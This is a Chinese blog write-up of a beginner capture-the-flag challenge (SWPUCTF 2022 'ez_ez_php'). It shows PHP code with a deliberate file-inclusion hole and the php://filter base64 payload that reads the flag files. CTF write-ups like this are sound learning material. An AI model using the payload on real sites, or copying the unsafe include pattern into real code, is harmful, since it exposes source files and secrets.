首页 > 编程语言 >NSSCFT [SWPUCTF 2022 新生赛]ez_ez_php

NSSCFT [SWPUCTF 2022 新生赛]ez_ez_php

时间:2024-08-20 09:04:27浏览次数:14  
标签:SWPUCTF 试试 代码 NSSCFT filter flag ez php

进入之后就看见一段php代码,那就直接开始代码审计

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {//截取字符串前三个字符,并与php做判断
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

这段代码,就是限定我们输入的内容前三个字符必须是php,这不就好办了,他告诉我们存在一个flag.php文件,那我们直接用php伪协议中的php://filter来试试

/?file=php://filter/read=convert.base64-encode/resource=flag.php

 

 放进解码器解码得到下面的代码。

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");


echo   "NSSCTF{flag_is_not_here}" ."<br/>";
echo "real_flag_is_in_'flag'"."<br/>";
echo "换个思路,试试PHP伪协议呢";

他说flag不在flag.php里面,在flag里面,那我们直接将flag.php改为flag试试

/?file=php://filter/read=convert.base64-encode/resource=flag

 

 继续解码试试

 

 成功获得flag

标签:SWPUCTF,试试,代码,NSSCFT,filter,flag,ez,php
From: https://www.cnblogs.com/karasbai/p/18368710

相关文章

  • Nssctf [SWPUCTF 2021 新生赛]error
    进入之后是一个搜索框,里面叫你传一个id值,先看一看网页代码,发现一端后端数据库代码,说明是报错注入   extractValue()报错注入先进行字段判断,使用"1'groupby1#"来判断1'groupby1#正常回显 出错回显 说明有三个字段,接着进行数据库名的爆破1'unionsel......
  • 宝塔 ftp访问不了的问题 filezilla访问不了Purefpt服务
     在使用filezilla220Youwillbedisconnectedafter15minutesofinactivity. 命令:AUTHTLS 阿里云的端口放开设置:39000,40000是PureFtp服务的被动模式端口放开  修改PureFTp的配置: ForcePassiveIP放开,并配置成自己服务器的外网地址:  ......
  • NSSCTF [SWPUCTF 2021 新生赛]easyupload3.0
    进入页面,是一个文件上传,放个图片马上去,用bp抓包正常进行文件上传,发现一般的后缀都被过滤了 使用.user.ini后门但好像也不行。没有什么头绪,去网上看看大佬们怎么做的。发现他们是通过修改.htaccess文件的配置来实现后门,之前也只了解过这个后缀,先去看看是干嘛的,具体怎么用。大佬......
  • gym序列化、EzPickle类
    EzPickle是一个用于强化学习环境的类,它重写了__getstate__和__setstate__方法,以便通过构造函数参数(*args,**kwargs)进行序列化和反序列化。这个设计允许那些无法直接用pickle库处理的对象,如数据库连接和网络套接字,也能在保存和恢复时保持其状态。"""Classforpicklingandun......
  • [NSSCTF 2022 Spring Recruit]ezgame
    首先查看本题描述:js分析,源码泄露,信息收集,大致了解了题的解法方向,进入题目页面查看一下,是一个射击游戏,查看源码发现要获得65分才能拿到成绩,一般来说这种游戏基本不可能拿到给定的分数,通常是对源码进行分析然后用bp抓包改包以此来进行分数获得。 结合前面题解的描述,我们先对js文......
  • cx_Freeze 打包生成Linux可执行文件
    准备一台linux系统环境安装cx_Freezepipinstallcx_Freeze准备两个py脚本1,app应用脚本,需要打包的app.pyimportrandomimporttimefromflaskimportFlask,jsonifyfromconcurrent.futuresimportThreadPoolExecutorapp=Flask(__name__)executor=ThreadPoolE......
  • tez hadoop的编译和安装(基于window)
    由于大多数服务器和外网做了隔离,进行源码编译并不方便,所以采用window进行编译1.安装maven并需要配置conf进行可用源。尽量用公共源,公司内部源并不全2.进行windowprotoc-2.5.0-win32.zip的下载和安装需要到环境变量进行路径配置3./apache-tez-0.9.2-src下载tez源码进行编......
  • 万户OA ezOFFICE graph_include.jsp接口SQL注入漏洞复现 [附POC]
    文章目录万户OAezOFFICEgraph_include.jsp接口SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议万户OAezOFFICEgraph_include.jsp接口SQL注入漏洞复现[附P......
  • How to upgrade pip on Debian Wheezy
    DebianWheezyprovidesanancientversionof pip utilityforinstallingPythonpackages.Toputitverysimply,itdoesnotworkanymoreasitisnotusing HTTPS protocol,butfortunatelythisissuecanbequicklyfixed.Debianversion.$lsb_release-a......
  • SSM宠物医院管理系统fy9ez 系统界面在最后面
    本系统(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。系统程序文件列表系统内容:用户,医生,就诊信息,预约信息,宠物档案,在线咨询,咨询回复,宠物资讯,宠物造型开题报告内容一、研究背景随着宠物行业的快速发展,宠物已成为许多家庭的......